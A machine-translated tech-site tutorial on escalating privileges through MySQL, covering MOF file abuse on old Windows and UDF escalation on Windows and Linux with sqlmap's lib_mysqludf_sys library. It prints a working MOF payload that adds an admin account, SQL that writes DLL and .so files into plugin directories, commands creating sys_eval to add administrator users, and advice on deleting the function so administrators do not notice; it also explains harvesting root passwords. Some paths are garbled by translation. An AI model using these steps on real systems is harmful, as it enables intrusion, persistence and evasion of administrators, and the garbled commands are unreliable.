In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-03-31 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)06/01 Report--
This article shows you how to raise rights in MySQL. The content is concise and easy to understand. It will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.
The necessary conditions for MySQL to raise the right:
Has root permissions for MySQL, and MySQL runs with system permissions.
Have permission to execute SQL statements.
How to get the root password:
View database configuration file
Keywords: config, conn, sql, data, inc, database, etc.
Download the data file under the mysql installation path
The data directory under the installation path stores the data information of the database.
The root account password is stored in the user table under the mysql database.
Full path = installation path +\ data\ mysql\ user.MYD
Brute force cracking
Several ways of raising Rights in MySQL Database
Udf raises the right
Mof raises the right
Boot script (startup item rights)
MOF raises the right
Principle
Make use of the nullevt.mof file in the C:\ Windows\ System32\ wbem\ MOF directory
Taking advantage of the fact that the file is executed every minute, writing cmd commands to the file will be executed.
Utilization condition
It can only be used in windows systems, but only in low-version systems, such as xp and server2003.
Read and write access to the C:\ Windows\ System32\ wbem\ MOF directory
You can find a writable directory and write to the mof file
Method of raising rights
Upload mof files in a writable directory.
Upload the mof file to C:/wmpub/nullevt.mof
Copy this file to the C:/Windows/System32/wbem/MOF/nullevt.mof directory
Select load_file ('Clux Universe wmpubmax nullevt. MOF') into dumpfile 'Cpurl Unix Windows Universe System32 and wbemUnix MOFmax nullevt.MOF'
Copy the following code to the file with the mof suffix
# pragma namespace ("\.\ root\ subscription") instance of EventFilter as $EventFilter {EventNamespace = "Root\ Cimv2"; Name = "filtP2"; Query = "Select * From InstanceModificationEvent"Where TargetInstance Isa\" Win32_LocalTime\ "" And TargetInstance.Second = 5 "; QueryLanguage =" WQL ";}; instance of ActiveScriptEventConsumer as $Consumer {Name =" consPCSV2 "; ScriptingEngine =" JScript "; ScriptText =" var WSH = newActiveXObject (\ "WScript.Shell\")\ nWSH.run (\ "net.exe user admin admin / add") "; Instance of _ _ FilterToConsumerBinding {Consumer = $Consumer;Filter = $EventFilter;}
By uploading the mof file to the target machine, you can modify the code and execute the command.
At present, the method of lifting weight in mof is less, so it is recommended to use udf script to lift weight in MySQL database.
Remedial measures
When it is found that the server is being raised using mof, resolve the way to continue to execute system commands:
Stop the winmgmt service first: net stop winmgmt
Delete the folder: C:\ Windows\ System32\ wbem\ Repository
Restart the winmgmt service: net start winmgmt
UDF weighting (user-defined function weighting)
Principle
UDF (User Defined Funtion) user-defined function, which extends the function of mysql server by adding new functions.
Information collection
Select version (); # get the database version select user (); # get the database user select @ @ basedir; # get the database installation directory show variables like'% plugin%'; # View the plugin path Windows UDF raises the right
UDF can be understood as the function library of MySQL, and you can make use of the creation function defined by udf. To take advantage of udf, you must upload udf.dll as the execution library for udf. The UDF extension is supported in MySQL, which allows us to call functions in DLL to achieve some special functions.
Utilization condition
If the mysql version is greater than 5.1, the mysql udf.dll file must be placed in the MySQL\ Lib\ Plugin\ folder of the mysql installation directory, which does not exist by default. You need to use webshell to find the mysql installation directory, and create the DLL\ Lib\ Plugin\ folder under the installation directory, and then import udf.dll into this directory.
If the mysql version is less than 5.1, the windows server udf.dll file is placed in the c:/windows/system32/ directory under windows server 2003 and in the c:/winnt/system32/ directory under windows server 2000.
Master the root account of the mysql database, and thus have insert and delete permissions on mysql to create and discard functions.
Have permission to write udf.dll to the appropriate directory.
Basic steps
The method of obtaining DLL File
In the sqlmap/data/udf/mysql directory, there are 32-bit and 64-bit dll files (MySQL digits) in the Windows directory.
The dll files in the folder are XOR encoded and can be decoded using sqlmap/extract/cloak.py
Python / sqlmap/extra/cloak/cloak.py-d-I / sqlmap/udf/mysql/windows/64/lib_mysqludf_sys.dll_
Upload the decoded DLL file (DLL file containing user-defined functions) to a writable directory, and then import it into MySQL\ lib\ plugin\
Select LOAD_FILE ('select LOAD_FILE / writable directory / lib_mysqludf_sys.dll') into dumpfile' CentralAccording phStudy2016MySQLAccording to MySQL _
Introduce functions from DLL into MySQL database
Create a custom function
Create function sys_eval returns string soname 'lib_mysqludf_sys.dll'
Create a function named sys_eval with a return value of type string and call a file of type lib_mysqludf_sys.dll
Note: if you need to create functions that exist in the .dll file, you can open the .dll file using a hexadecimal editor to see the functions that can be created.
Use this function to execute system commands to lift weights
View current user permissions
Select sys_eval ("whoami")
Create an account and upgrade it to administrator privileges
Select sys_eval ("net user winhex passw@ord / add")
Select sys_eval ("net localgroup administrators winhex / add")
Delete the previously introduced function
Prevent it from being discovered by administrators and prevent other attackers from using
Drop function sys_eval
Delete from mysql.func where name='sys_eval'
Linux UDF raises the right
Brief introduction
Execute arbitrary commands by customizing library functions
The file containing the user-defined function is a .so file
Request
Under [mysqld] in my.ini, add secure_file_priv= "" without restricting the import and export path.
Has the password of the database root account, and the mysql database runs with root privileges
Have permission to execute sql statements
Export directory writable
Selinux in the system is turned off
The process of empowerment
Find the path to the plug-in library
Show variables like'% plugin%'
The results are as follows:
Variable_nameValueplugin_dir/usr/lib64/mysql/plugin
Find the UDF library file corresponding to the operating system database
The lib_mysqludf_sys.so_ file under sqlmap-master\ data\ udf\ mysql\ linux\ 64
Hexadecimal encoding of so files (UDF library files)
Decode the contents of the so file and write it to the mysql plug-in library directory
Select unhex ('hexadecimal encoding of so files') into dumpfile'/ usr/lib64/mysql/plugin/xxx.so'
View the functions supported by the udf library
Note: if you need to create functions that exist in the .so file, you can open the .so file using a hexadecimal editor to see the functions that can be created.
Create function
Once written, the command to create the function is executed, and a function of sys_eval is created to execute system commands, all of which are system permissions.
Create function sys_eval returns string soname 'xxx.so'
Carry out the system order, raise the right
Sys_eval this function can execute system commands, you can enter system commands in parentheses.
View current user permissions
Select sys_eval ("whoami")
Create an account and upgrade it to administrator privileges
There is no need to judge the version of mysql, just check the path and write the so file directly. The file in Linux is so file.
After getshell, enter whoami on the terminal and find that it is only the apache user right.
Look for the database configuration file of the website, check the account password of the database, and you can see the account root password root.
Log in to the mysql database and enter show variables like'% plugin%'; to view the plugin path.
The results are as follows:
Variable_nameValueplugin_dir/usr/lib64/mysql/plugin
We encode the so file in hexadecimal, decode it and write it to the directory, which is returned as true.
Select unhex ('hexadecimal encoding of so files') into dumpfile'/ usr/lib64/mysql/plugin/xxx.so'
Once written, the command to create the function is executed, and a function of sys_eval is created to execute system commands, all of which are system permissions.
Create function sys_eval returns string soname 'xxx.so'
Sys_eval this function can execute system commands, you can enter system commands in parentheses.
Select sys_eval ('whoami')
The above content is how to raise rights in MySQL. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.